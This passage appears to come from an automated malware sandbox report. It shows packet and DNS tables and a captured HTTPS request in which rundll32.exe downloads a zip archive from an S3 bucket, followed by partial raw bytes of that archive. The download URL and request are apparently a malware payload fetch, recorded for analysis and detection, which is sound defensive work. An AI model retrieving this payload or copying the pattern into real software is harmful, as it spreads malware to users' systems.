                                                  Mar 7, 2024 10:47:32.678709984 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.678715944 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.678742886 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.678750992 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.679723978 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.679744959 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.679783106 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.679786921 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.679816008 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.679831982 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.680932999 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.680953979 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.680994034 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.681000948 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.681032896 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.681042910 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.681596041 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.681621075 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.681652069 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.681658030 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.681684971 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.681698084 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.682400942 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.682424068 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.682461023 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.682466030 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.682492971 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.682503939 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.683358908 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.683379889 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.683414936 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.683420897 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.683449984 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.683470011 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.684320927 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.684341908 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.684381962 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.684386969 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.684413910 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.684431076 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.685700893 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.685723066 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.685780048 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.685786009 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.685821056 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.687096119 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.687124968 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.687166929 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.687174082 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.687201023 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.687212944 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.687964916 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.687990904 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.688024044 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.688030005 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.688056946 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.688074112 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.688647985 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.688684940 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.688715935 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.688721895 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.688745975 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.688766956 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.689460993 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.689480066 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.689534903 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.689539909 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.689568996 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.689584970 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.690331936 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.690351963 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.690388918 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.690395117 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.690427065 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.690443993 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.691277027 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.691298008 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.691338062 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.691343069 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.691373110 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.691387892 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.692167044 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.692186117 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.692231894 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.692238092 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.692249060 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.692316055 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.693082094 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.693100929 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.693150043 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.693156004 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.693183899 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.693200111 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.693963051 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694040060 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694051027 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.694055080 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694080114 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.694099903 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.694705963 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694725037 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694757938 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.694763899 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694788933 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.694808006 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.695702076 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.695719957 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.695785046 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.695790052 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.695823908 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.696631908 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.696650982 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.696710110 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.696716070 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.696753025 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.697491884 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.697510958 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.697545052 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.697550058 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.697577953 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.697592974 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.698255062 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.698302984 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.698312998 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.698317051 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.698350906 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.699129105 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.699147940 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.699182034 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.699186087 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.699214935 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.699234962 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.699912071 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.699939013 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.699970961 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.699976921 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.700002909 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.700016975 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.700851917 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.700874090 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.700920105 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.700926065 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.700952053 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.700963974 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.701754093 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.701778889 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.701813936 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.701818943 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.701843977 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.701859951 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.702605963 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.702625990 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.702665091 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.702670097 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.702682972 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.702707052 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.703336954 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.703360081 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.703394890 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.703401089 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.703429937 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.703443050 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.704451084 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.704471111 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.704504013 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.704509020 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.704530001 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.704549074 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.705450058 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.705470085 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.705507994 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.705513000 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.705529928 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.705545902 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.706609964 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.706629992 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.706675053 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.706681013 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.706707954 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.706720114 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.707802057 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.707829952 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.707859039 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.707864046 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.707890987 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.707907915 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.708853960 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.708878040 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.708910942 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.708916903 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.708940983 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.708956957 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.709625959 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.709644079 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.709681034 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.709686041 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.709721088 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.709733963 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710138083 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.710180998 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.710197926 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710203886 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.710222006 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710239887 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710268021 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.710309982 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710483074 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710499048 CET443497053.5.232.137192.168.2.5

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Mar 7, 2024 10:47:27.663292885 CET5531353192.168.2.51.1.1.1
                                                  Mar 7, 2024 10:47:27.890398026 CET53553131.1.1.1192.168.2.5

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Mar 7, 2024 10:47:27.663292885 CET192.168.2.51.1.1.10x726dStandard query (0)bucreate203920233.s3.sa-east-1.amazonaws.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Mar 7, 2024 10:47:27.890398026 CET1.1.1.1192.168.2.50x726dNo error (0)bucreate203920233.s3.sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                  Mar 7, 2024 10:47:27.890398026 CET1.1.1.1192.168.2.50x726dNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.137A (IP address)IN (0x0001)false
                                                  Mar 7, 2024 10:47:27.890398026 CET1.1.1.1192.168.2.50x726dNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.174A (IP address)IN (0x0001)false
                                                  Mar 7, 2024 10:47:27.890398026 CET1.1.1.1192.168.2.50x726dNo error (0)s3-r-w.sa-east-1.amazonaws.com52.95.164.19A (IP address)IN (0x0001)false
                                                  Mar 7, 2024 10:47:27.890398026 CET1.1.1.1192.168.2.50x726dNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.26A (IP address)IN (0x0001)false
                                                  Mar 7, 2024 10:47:27.890398026 CET1.1.1.1192.168.2.50x726dNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.22A (IP address)IN (0x0001)false
                                                  Mar 7, 2024 10:47:27.890398026 CET1.1.1.1192.168.2.50x726dNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.66A (IP address)IN (0x0001)false
                                                  Mar 7, 2024 10:47:27.890398026 CET1.1.1.1192.168.2.50x726dNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.0.18A (IP address)IN (0x0001)false
                                                  Mar 7, 2024 10:47:27.890398026 CET1.1.1.1192.168.2.50x726dNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.6A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • bucreate203920233.s3.sa-east-1.amazonaws.com

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.5497053.5.232.1374437520C:\Windows\System32\rundll32.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-03-07 09:47:29 UTC336OUTGET /bucketTc.zip HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                  Host: bucreate203920233.s3.sa-east-1.amazonaws.com
                                                  Connection: Keep-Alive
                                                  2024-03-07 09:47:29 UTC435INHTTP/1.1 200 OK
                                                  x-amz-id-2: 5cJSVvyLB5RHgBQRrWVM+6ZvMIFI0PimtUp9Tz6vkUz1TqSuTXSuIjZ2R8iX42XcD+odmbZ7b1oG7xi57zvteg==
                                                  x-amz-request-id: FXBQ0XJZAYDE6RHP
                                                  Date: Thu, 07 Mar 2024 09:47:30 GMT
                                                  Last-Modified: Wed, 06 Mar 2024 05:27:41 GMT
                                                  ETag: "b952a1b57aae836929b07ee6b6306c61"
                                                  x-amz-server-side-encryption: AES256
                                                  Accept-Ranges: bytes
                                                  Content-Type: application/zip
                                                  Server: AmazonS3
                                                  Content-Length: 7426462
                                                  Connection: close
                                                  2024-03-07 09:47:29 UTC7667INData Raw: 48 7e 88 45 61 e7 06 6b 79 4a 63 ad ab 62 f6 47 df 51 a6 08 0e 41 0f df 94 63 8a 7b 0e 41 74 98 e5 8c 1e 65 42 5f 42 8b 2f 36 7b b2 c9 bd 02 97 01 97 bb da c9 1a 37 dc c8 ab 77 a5 0f 8b 86 d4 ff 03 d9 48 a8 dd 50 ca a2 c8 15 00 4d 0c 3a 13 82 24 74 7e 2f 5d c7 3f a9 fa 9d da 25 00 98 c7 6b b9 75 4c ef 85 3c f0 5f 4d 4e d2 38 35 78 7b 55 6b a4 3c 5a b6 a1 e8 b8 f7 fc dd 3f 4e 2d de af df bc e0 85 84 4f 95 21 28 c1 2c 44 80 f0 01 a5 d6 1f b2 9c 29 52 c2 67 b2 94 7e 1a ae 56 22 d5 3e 3f 53 98 cd ec b2 ae 26 0d 4f 85 c6 c1 16 e3 e3 57 71 c0 7b ec 71 7c f8 f3 85 03 e6 bf 4e b2 c7 a7 70 7a 3f 63 89 42 1c 48 d1 94 66 e5 be c9 ce 91 fc 3a 9f 1d 89 26 54 3e 81 fe 04 38 c5 6b db 69 7a 32 dc 09 b0 11 0f 44 02 8b 71 6e 17 bd 2c ab 91 22 26 f5 27 e2 6a 53 6d 4c 8e 99
                                                  Data Ascii: H~EakyJcbGQAc{AteB_B/6{7wHPM:$t~/]?%kuL<_MN85x{Uk<Z?N-O!(,D)Rg~V">?S&OWq{q|Npz?cBHf:&T>8kiz2Dqn,"&'jSmL
                                                  2024-03-07 09:47:29 UTC16384INData Raw: 76 61 1d 8d 88 88 44 1c 60 64 0e 26 8e 7a 1a 3e e7 1d 72 99 46 1d 29 76 5f 0d 3c b1 07 65 bb 64 5f ac 25 2c fa 20 02 24 09 8e 6e 5f 1f 3b 59 8e a6 35 34 e6 8c 84 54 81 89 d6 89 c0 a6 e0 7d b2 cb f3 ca 08 6f bb ed ce f0 74 00 23 ce cc c2 9f 67 2d 53 39 57 68 c4 66 d6 87 8c 67 4e bd 83 7b 87 2c bd e2 76 2b 92 cc a4 e5 27 42 8c 30 39 98 dc 3d ac 4e aa 08 81 6a 68 b7 8d db 9e 4f 82 cf 9f 46 0c f5 78 66 6b 22 9c 09 37 97 cb b2 92 bc 74 f4 91 62 7b e9 8f 16 bd ad 27 6f f3 d8 b3 68 fc c2 61 01 46 9d 83 13 cd f1 4a a0 13 fb 8c 2b ee d8 c6 eb ca d7 42 20 82 d3 22 a4 1f 81 f4 0f 37 6b be 29 66 58 4a 6a 78 df af 9d ad 3c 0f 5d fb 81 8a c7 c0 a9 a2 88 2a 17 a6 fc 04 2d e7 a1 f4 27 79 60 41 22 0a 6c 4e 08 25 d2 79 2f 6c d1 40 72 ef f6 bd f8 7e 41 50 bd f3 8d 24 4a b3
                                                  Data Ascii: vaD`d&z>rF)v_<ed_%, $n_;Y54T}ot#g-S9WhfgN{,v+'B09=NjhOFxfk"7tb{'ohaFJ+B "7k)fXJjx<]*-'y`A"lN%y/l@r~AP$J
                                                  2024-03-07 09:47:29 UTC1024INData Raw: 1a 62 99 bc 2d 63 86 11 a2 85 11 22 31 df da 0f 61 ab 13 4c 71 68 77 4f a2 1d ac 8a 0f 93 84 72 61 e1 50 35 d8 ee c5 a2 0a c0 e1 cb 2a 33 2d 48 63 e4 52 a8 c8 2f f8 9e 89 80 14 3e a9 54 a5 2c e5 43 5a 81 b0 ec 6c 60 20 44 1d eb e6 5c 81 f2 ad 42 00 0f 77 c2 ee 98 4a 3b 38 d8 0f 91 29 8a 92 63 c7 ae 3c 88 78 d7 24 d2 17 8e 53 ee 20 82 2c 89 d5 07 47 db e3 dd 96 4e 5f 2a 57 71 96 f4 b1 78 74 ca 8e ee 07 92 44 e4 1f c8 1f bc 0d c3 25 23 11 b7 9d 0d 42 c2 b0 69 ba a2 2f eb 9d 33 ff a4 87 3f 42 a3 6e 13 16 16 44 07 7a 66 09 b9 cd 71 d1 58 d1 cd b3 00 0d 0e 3a c6 92 6f cd 44 37 57 16 ca 1f 3b 74 64 d2 58 f8 bf 9c d8 ce 58 a3 b7 93 ad 42 34 f7 55 58 aa 0a 48 9b ed bf 81 ee 4d 07 88 51 2b 29 9a 7d fe 74 bf 1f 05 f8 49 d0 52 d0 76 ec 7a ab 47 38 fa d4 9c 8c db 4a
                                                  Data Ascii: b-c"1aLqhwOraP5*3-HcR/>T,CZl` D\BwJ;8)c<x$S ,GN_*WqxtD%#Bi/3?BnDzfqX:oD7W;tdXXB4UXHMQ+)}tIRvzG8J
                                                  2024-03-07 09:47:29 UTC16384INData Raw: 5e 20 8d 1e 16 b6 57 e5 d3 7a af f0 d8 75 d8 05 41 d9 3f 64 11 4e 47 22 ab 12 eb e8 4e 0b 5e 9f a2 a2 64 ec 79 01 70 1e f0 dc 28 64 12 97 ae 9c b1 fc 09 54 7f be 23 6a 44 2d f0 06 c2 91 af 76 1a f8 0d b7 da 32 6e d7 29 28 33 df fd 33 6f 7a 7d 78 f0 84 d5 12 f7 2f bd 96 c5 e6 ce d6 b0 12 d6 f6 2e 47 d1 57 10 69 c2 ae 67 c3 53 89 d6 38 07 25 e3 a1 fe fd bb 57 d0 2e 43 8a a0 b4 0f 9c 8a b2 28 3c 37 b4 f3 9c a3 49 13 ff d3 e1 c0 e1 76 23 29 33 46 cb f7 d0 17 85 ec a7 44 99 bf ae 7b 8d 5b bf 3c a4 90 4c 01 a0 0e ee 7d 11 50 37 d1 7a af 9a 11 90 59 07 bc 39 6d 80 31 78 5e 18 97 21 8e df 6b 72 08 2c d4 28 c1 d1 e1 8f 1e 58 b8 b8 22 87 e8 8b 99 01 fb 16 6a c6 7d a3 ff bd 86 40 a8 19 ba cf 0f 6d e5 92 b1 b3 38 e5 25 3c 88 c3 00 d9 8f d7 3a 66 65 c3 0f ae 06 0e 07
                                                  Data Ascii: ^ WzuA?dNG"N^dyp(dT#jD-v2n)(33oz}x/.GWigS8%W.C(<7Iv#)3FD{[<L}P7zY9m1x^!kr,(X"j}@m8%<:fe
                                                  2024-03-07 09:47:29 UTC1024INData Raw: b6 a7 eb f0 84 58 54 a5 29 b4 fc 84 4a ca 49 c0 d9 23 24 c9 0c 9f 5c 06 bd 62 a8 39 c7 38 04 a0 a1 82 88 f1 a6 1d 1a 02 22 e9 17 f7 3f bf 8c 4e 2a ce 6e ce 2e d4 42 ae 59 c3 41 f1 fa ef f9 aa 8e f8 d9 cf 7e 63 d9 d7 a2 ee 25 7c c5 9b 41 4a 9a b7 e8 c4 64 8b a6 04 17 60 e8 5b 1f f2 db b3 75 68 66 8b d8 a1 a9 f1 d7 07 98 da ea ee f7 4f b6 8d a6 65 5b 8b 75 05 f2 4c df 60 7d b4 ad 43 cc da d6 00 2d 99 8d cb 38 47 8e 0c b4 f4 59 96 4d 6f b7 90 db ed 3e 6c 7b f7 d8 63 0b ba 82 a5 cf 94 9d ef af 59 af ab 68 12 33 e1 38 73 cc 69 78 ce a1 a5 3c 6f c9 8c e1 5a 35 fa c4 d4 62 2c ad 7e d5 cd 08 84 be 74 c7 f9 dc b1 c2 c2 25 94 c9 44 ac dd 7c 8e 5c 47 c4 3a bc 63 60 c7 38 40 51 65 47 a9 98 70 9f 8b d0 1c a0 b4 a2 00 fa 2b cd 82 ce aa 1a 65 58 60 7a 28 80 f5 ef f4 77
                                                  Data Ascii: XT)JI#$\b98"?N*n.BYA~c%|AJd`[uhfOe[uL`}C-8GYMo>l{cYh38six<oZ5b,~t%D|\G:c`8@QeGp+eX`z(w
